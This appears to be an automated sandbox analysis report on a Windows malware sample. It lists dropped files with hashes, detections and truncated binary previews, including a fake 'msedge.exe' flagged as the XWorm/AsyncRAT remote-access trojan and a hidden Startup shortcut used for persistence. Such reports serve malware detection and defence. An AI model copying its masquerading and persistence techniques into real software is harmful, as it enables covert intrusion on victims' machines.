                                                                                                                                                                                                    SSDEEP:768:QCy9Hf68Z5Im9G9JyUFRYT2Ip4HCxf1mlzzTz:QCy9/68Z5Im9G3yUzR9YfIPv
                                                                                                                                                                                                    MD5:62FE3761D24B53D98CC9B0CBBD0FEB7C
                                                                                                                                                                                                    SHA1:317344C9EDF2FCFA2B9BC248A18F6E6ACEDAFFFB
                                                                                                                                                                                                    SHA-256:81F124B01A85882E362A42E94A13C0EFF2F4CCD72D461821DC5457A789554413
                                                                                                                                                                                                    SHA-512:A1D3DA17937087AF4E5980D908ED645D4EA1B5F3EBFAB5C572417DF064707CAE1372B331C7096CC8E2E041DB9315172806D3BC4BB425C6BB4D2FA55E00524881
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{.*.(.*.(.*.(.R.(.*.(..).*.(..).*.(..).*.(..).*.(w..).*.(.*.(.*.(...).*.(w..).*.(w..).*.(w..(.*.(w..).*.(Rich.*.(................PE..d....WOg.........." ...*.....2......................................................n.....`..........................................@..L...<A..x....p.......`.......J...3......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pyd

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):711912
                                                                                                                                                                                                    Entropy (8bit):5.867548153768221
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:LY4dLI/X77mvfldCKGihH32W3cnPSqrUgLnm:LY4W7qNxr3cnPXLnm
                                                                                                                                                                                                    MD5:43B8B61DEBBC6DD93124A00DDD922D8C
                                                                                                                                                                                                    SHA1:5DEE63D250AC6233AAC7E462EEE65C5326224F01
                                                                                                                                                                                                    SHA-256:3F462EE6E7743A87E5791181936539642E3761C55DE3DE980A125F91FE21F123
                                                                                                                                                                                                    SHA-512:DD4791045CF887E6722FEAE4442C38E641F19EC994A8EAF7667E9DF9EA84378D6D718CAF3390F92443F6BBF39840C150121BB6FA896C4BADD3F78F1FFE4DE19D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.B...f......P,....................................................`.........................................P...X................................6..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mhwqddl.kkz.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wenzjvz.s15.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wpoattn.gyp.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cetgemtj.brj.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyest5qu.alf.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2odast5.lz5.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr0pfgtv.ayr.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4wbibl1.kuf.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lllx1qff.k55.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk1gblju.qcc.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1p0nrfp.nrl.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t22p1hz4.nho.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhvg0vpa.00w.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urg4fxgu.qwh.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqkljunn.g0t.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yatloc00.bti.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\dddd.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):819200
                                                                                                                                                                                                    Entropy (8bit):5.598261375667174
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
                                                                                                                                                                                                    MD5:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                                                                    SHA1:30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
                                                                                                                                                                                                    SHA-256:8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                                                                                                                                                                                                    SHA-512:431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........|............................................................0..R.......(....:....*r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&*.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o......*.......8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(......*.....(....~....%:....&~......*...s....%.....(...+*...0..l.........(....r...p(....(....r\..p.

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\hfdpzcz6

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:qn:qn
                                                                                                                                                                                                    MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                    SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                    SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                    SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:blat

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\msedge.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                                    Entropy (8bit):6.0557840174909385
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:S2q2+SuMeXA5gBQsGQ17zcaIcbml5eUwqo/wc/D6X0i3KOOtJHcA+:SV23ua0VKcbml5vje/Zi3FOtJ/+
                                                                                                                                                                                                    MD5:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    SHA1:400525C81A140BEB77C035C95480D40B64496F8E
                                                                                                                                                                                                    SHA-256:68A5C3157A890D65AE1836EF3794A757D9F1F06559CCF174E7B0E6293ADA8925
                                                                                                                                                                                                    SHA-512:967E096C8091968CE0B2D53DFF0632B0CDC34D8B11E34C7F5CE8CEDD853D860F059E51318ECFD564BA0545A4304AFCCC8B4567BE777A2D55BB4C761E91F1F8DA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g.................>...........\... ...`....@.. ....................................@.................................d\..W....`............................................................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................\......H........b..........&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ..A.*.s.........s.........s.........s.........*.r...p*. .+u.*.rV..p*. j...*.r...p*. }&..*.r...p*. S...*.ro..p*. *p{.*..((...*.r...p*. ...*.r...p*. +.).*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rp..p*. ~.H.*.r...p*. ....*.r...p*. ..?.*.rk..p*. ..e.*.r...p*.r...p*.rf..p*.r...p*. ..

                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:04:28 2024, mtime=Fri Dec 20 17:04:28 2024, atime=Fri Dec 20 17:04:28 2024, length=83968, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                    Entropy (8bit):5.065956055628723
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8PFsh64MukChJfyY//4Jx1SLAlidsldHTjABuHlyfHN2Nh2NfmV:8PCMDIJWsa/Arl2/25m
